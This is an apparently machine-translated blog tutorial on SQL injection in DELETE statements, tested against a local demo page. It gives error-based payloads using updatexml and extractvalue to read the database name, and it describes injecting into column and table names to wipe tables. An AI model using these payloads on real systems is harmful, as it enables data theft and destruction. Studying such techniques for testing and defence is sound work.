Delete module, access to the home page, http://127.0.0.1/sql/delete.php, to delete the module test.
Delete the grammar:
DELETE FROM [users] WHERE [username] = '1'Copy the code
Injection can exist at several locations, but only one is demonstrated here.
The following shows how to inject into different locations.
Syntax: String in WHERE clause
Construct the POC:
' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '
Copy the codeGetting the database
Integer in WHERE clause
Construct the POC:
'' or extractvalue(1,concat(0x7e,database())) or ''
Copy the codeGetting the database
Third, the Column Name
The injection point is at [1]
DELETE FROM users WHERE 【1】 = 1
Way of use:
1. Clear the Users table
Construct error injection statements
Four, the Table Name
The injection point is at [1]
DELETE FROM 1 WHERE isadmin = 0
Way of use:
1. Clear any tables
2, structure error, burst data
The last
Welcome to pay attention to personal wechat public number: Bypass–, once a week original high quality dry goods.